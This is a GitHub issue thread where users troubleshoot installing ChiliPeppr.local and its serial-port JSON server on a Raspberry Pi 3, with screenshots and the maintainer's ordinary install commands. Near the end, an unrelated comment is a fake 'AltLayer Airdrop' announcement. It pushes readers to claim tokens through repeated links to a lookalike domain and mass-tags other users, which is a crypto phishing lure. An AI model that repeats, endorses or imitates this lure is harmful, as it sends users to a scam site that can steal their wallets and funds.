### ISSUE TITLE
Install on RASPI 3

### ISSUE THREAD

**Issue by airlinepilot** [xpix/chilipeppr.local#3]
Great Work !!!  I have installed Chilipeppr.local onto my RASPI.  From my notebook i goto 192.168.1.111:8090  and I get ChiliPeppr.  On the same RASPI i have also installed JSON Server as well.  When I try and connect I get connection error.  Can you please say a little about installation on RASPI.

Thankyou

DeWayne

**Comment by annhan** [comment]
hi airlinepilot,
Can you help me install chilipeppr.local into my raspberry ?

thanks

**Comment by xpix** [comment]
Hello and sorry for my late answer, so what a kind of connection error you get @airlinepilot ?

@annhan I'll write a small tutorial for installation on rpi3.

**Comment by huvuqu** [comment]
![image](https://user-images.githubusercontent.com/22325354/32780280-43b6f814-c973-11e7-929c-d0e706a75d51.png)
This is problem i got with @airlinepilot : 
Connected but still get connection error?
Check my record for more. 
https://youtu.be/tqS8ggDJnm8

**Comment by xpix** [comment]
@uncencored I believe you run in a permission denied of your SPJS Server, please ensure that ur SPJS run in RPI as root and start him with verbose information:

   sudo -i ./serial-port-json-server -v

**Comment by huvuqu** [comment]
![image](https://user-images.githubusercontent.com/22325354/32835023-2c52c102-ca37-11e7-84ce-f5255445e916.png)
Still got disconnected 
![image](https://user-images.githubusercontent.com/22325354/32835120-85aaf292-ca37-11e7-812d-eb8acb5c5755.png)

**Comment by huvuqu** [comment]
Then i turn off the Serial JSON Server, this show me:
![image](https://user-images.githubusercontent.com/22325354/32835232-ec1945b0-ca37-11e7-963c-573ef1c217ce.png)

**Comment by xpix** [comment]
@airlinepilot I can't help you here, please open an issue here:

https://github.com/chilipeppr/serial-port-json-server/issues

**Comment by annhan** [comment]
@xpix Can you help me install it. i'm newbee . thanks you

**Comment by xpix** [comment]
@annhan Sure:
  ```
ssh pi@host
  wget https://github.com/chilipeppr/serial-port-json-server/releases/download/v1.94/serial-port-json-server-1.94_linux_arm.tar.gz
  tar zxvf serial-port-json-server-1.94_linux_arm.tar.gz
  cd serial-port-json-server-1.94_linux_arm/
  sudo ./serial-port-json-server -v
```

**Comment by xpix** [comment]
It's a SPJS Problem.

**Comment by airlinepilot** [comment]
I tested my SPJS with the chilipeppr.com . It's ok. I don't think the problem come from the SPJS

**Comment by annhan** [comment]
@xpix hi sir, i can install the sẻrial server. Bứt thế chilipeper local i can't. Manual install chilipeper local for raspberry? Thanks you

**Comment by xpix** [comment]
@airlinepilot But you got a list with all serial devices, in this moment SPJS works well, if u want we can make a hangout together and i try to fix ur problem.

**Comment by xpix** [comment]
@annhan please write me a personal message and don't hijack this thread for your problem :)

**Comment by huvuqu** [comment]
I assume you download the javascript library and change the source code to load them to make a local version. Is the folder jslib? It is 5 months ago, maybe the SPJS updated some stuff and we need update library.

**Comment by airlinepilot** [comment]
Hello you left me a msg asking for help on getting ChiliPeppr.LOCAL running on RASPI, 

Do you live in Vietnam?

We are still working on getting it to work. Will be happy to share the results as soon as we get it working.


dewayne.young (AT) me.com <http://me.com/>

**Comment by xpix** [comment]
@uncencored Ok, i test this again with my raspberry 3 (it's my 3d printer machine) with a brandnew gquintic board / g2core firmware, to figure out if i run in the same error. And it work's as designed:

**Please ignore the red warning text that you are not connected!**

![image](https://user-images.githubusercontent.com/3763176/32981711-71658cae-cc79-11e7-9bac-182e0ab69f9d.png)

So maybe we make a live session and i can help?

**Comment by airlinepilot** [comment]
Can you post me a copy of your RASPI image,  Yes having a hangout would be great

**Comment by xpix** [comment]
No, too big. What is happend with error message in your Javascript console?
(CTRL+SHIFT + s) ?

**Comment by huvuqu** [comment]
So sorry, this time in Vietnam is midnight, I will give u a picture tomorrow. What is i checked yesterday, It only have warning massage. I will give you picture or clip tomorrow 👍 👍

**Comment by huvuqu** [comment]
When I open, i see some warning: 
![screen shot 2017-11-22 at 5 45 28 pm](https://user-images.githubusercontent.com/22325354/33123753-9679535e-cfad-11e7-870f-198c70dfeb8b.png)
Try  to connect to a SPJS it throws a errors:
![screen shot 2017-11-22 at 5 52 55 pm](https://user-images.githubusercontent.com/22325354/33124008-59c71a1c-cfae-11e7-8eff-2f6a524668a3.png)

**Comment by YeMyoAung** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - NFT Holders
  - Participants in the Altlayer Campaign
  - EigenLayer Restakers
  - Partners in the EigenLayer Ecosystem
  - Celestia Stakers and more
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [here](https://go.altlayercommunity.online/XY2wna).

The window to [claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

CMD-reverse, @sergproua, @Sailendrakc, @tiger02, @Mikeymichs, @ntsd, @ramonz, @SimonLuckenuik, @williamlee1982, @HortonsHelpers, @ZSY5201, @xyicheng, @cabbage89, @ilkerhalil, @Geekrick88, @Odilio, @heheboy, @MichDe, @resitkaradag, @StoyPenny
